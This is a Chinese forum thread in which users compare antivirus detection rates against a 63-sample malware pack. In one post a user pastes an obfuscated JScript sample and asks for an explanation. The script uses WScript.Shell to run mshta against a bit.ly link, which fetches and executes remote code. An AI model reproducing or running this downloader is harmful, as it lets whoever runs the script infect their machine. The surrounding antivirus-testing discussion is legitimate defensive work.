From MB 63X

显示全部楼层 · 发表于 2021-7-11 12:55:00

本帖最后由 ANY.LNK 于 2021-7-11 20:14 编辑

Microsoft Defender：解压监控+扫描kill 60X双击杀一个js，进程杀另一个js（阻止运行Behavior:Win32/MshtaLaunchScript.AD，二次双击后清除源文件）jar文件解压报告Trojan:Script/Wacatac.B!ml当前结果是全部击杀

显示全部楼层 · 发表于 2021-7-11 13:48:49

本帖最后由 eternity. 于 2021-7-11 13:52 编辑

Emsisoft: 62/63 (98.4%)

To Emsisoft.

显示全部楼层 · 发表于 2021-7-11 14:48:41

windows11BigSur 发表于 2021-7-11 10:10
2021.07.11-12:40
卡巴kill 62/63x
剩一个：

卡巴云就是速度拉黑太快了

显示全部楼层 · 发表于 2021-7-11 15:07:23

dongwenqi 发表于 2021-7-11 14:48
卡巴云就是速度拉黑太快了

最后一个貌似是个PUA，不知道为什么KSN识别，运行会有限制

显示全部楼层 · 发表于 2021-7-11 15:34:40

heavencc 发表于 2021-7-11 10:42
智量6.30锁库扫描40个，双击杀了七八个之后死机了，不知道是哪个样本导致的

你这不对吧，我是昨天的病毒库，我都是手动更新病毒库的，我测试扫描就剩3个其中一个还不能运行的，剩余两个双击过了5分钟才报毒的

显示全部楼层 · 发表于 2021-7-11 16:20:22

360 kill 59x
59/63=93.65%

显示全部楼层 · 发表于 2021-7-11 17:57:21

huicuan 发表于 2021-7-11 15:34
你这不对吧，我是昨天的病毒库，我都是手动更新病毒库的，我测试扫描就剩3个其中一个还不能运行的，剩余 ...

啊这，那这不是挺正常的嘛，你昨天的病毒库肯定比我30号的扫的多啊

显示全部楼层 · 发表于 2021-7-11 19:44:21

本帖最后由 ELOHIM 于 2021-7-11 19:48 编辑

ANY.LNK 发表于 2021-7-11 12:55
Microsoft Defender：解压监控+扫描kill 60X

3805b6d6779b1300b00e45a3dca087f264eed2efe5e3594dbd2b8bb1a728e6be.exe
这个就是可能不需要的应用。在病毒模块里面无法清除。需要单独在应用模块里面删除。你再试试看。目前，最终剩余：2个。

var _0x55c7=['4595NmlMOO','443908NwFHfk','Run','383252HatjQP','1249302QzvKjO','/3e2oKod','5zcoytW','707610jTvGxj','1pqOlEy','mshta\x20http','309xbKmfK','1VllgvK','WScript.Sh','CreateObje','s://bit.ly','18558KCRSSa','ell','247289sDglPI'];var _0x15782d=_0x9439;(function(_0x31e455,_0xcd27f9){var _0x491deb=_0x9439;while(!![]){try{var _0x578a5f=parseInt(_0x491deb(0x1b6))*parseInt(_0x491deb(0x1c0))+-parseInt(_0x491deb(0x1bd))+parseInt(_0x491deb(0x1c5))+parseInt(_0x491deb(0x1b9))*-parseInt(_0x491deb(0x1c1))+-parseInt(_0x491deb(0x1bc))*-parseInt(_0x491deb(0x1b5))+-parseInt(_0x491deb(0x1be))*parseInt(_0x491deb(0x1ba))+parseInt(_0x491deb(0x1b7));if(_0x578a5f===_0xcd27f9)break;else _0x31e455['push'](_0x31e455['shift']());}catch(_0x438963){_0x31e455['push'](_0x31e455['shift']());}}}(_0x55c7,-0xdf52b*0x1+-0x72e*-0x1b1+-0x13eb5*-0xb));function _0x9439(_0x2b0622,_0x3c016b){return _0x9439=function(_0x322cd4,_0x13f882){_0x322cd4=_0x322cd4-(-0x113b*0x1+0x220+0x10cf);var _0x42b1f0=_0x55c7[_0x322cd4];return _0x42b1f0;},_0x9439(_0x2b0622,_0x3c016b);}var shxqailb=WScript[_0x15782d(0x1c3)+'ct'](_0x15782d(0x1c2)+_0x15782d(0x1b4));rgmzidta=_0x15782d(0x1bf)+_0x15782d(0x1c4)+_0x15782d(0x1bb),shxqailb[_0x15782d(0x1b8)](rgmzidta,-0x9*-0x1bb+0x4e5+-0x8*0x28f),shxqailb=null;

复制代码

哪位大佬解释一下这代码？

显示全部楼层 · 发表于 2021-7-11 19:48:35

heavencc 发表于 2021-7-11 17:57
啊这，那这不是挺正常的嘛，你昨天的病毒库肯定比我30号的扫的多啊

哈哈，原来如此，不过智量的人工智能我双击过很多病毒，80%都能干掉。很不错，国产有几个能达到的

显示全部楼层 · 发表于 2021-7-11 19:59:00

本帖最后由 ANY.LNK 于 2021-7-11 20:02 编辑

ELOHIM 发表于 2021-7-11 19:44
3805b6d6779b1300b00e45a3dca087f264eed2efe5e3594dbd2b8bb1a728e6be.exe
这个就是可能不需要的应用。在 ...

用命令行扫描可以自动清除，而且报毒名似乎不同

[病毒样本] From MB 63X

本帖子中包含更多资源

本帖子中包含更多资源

浏览过的版块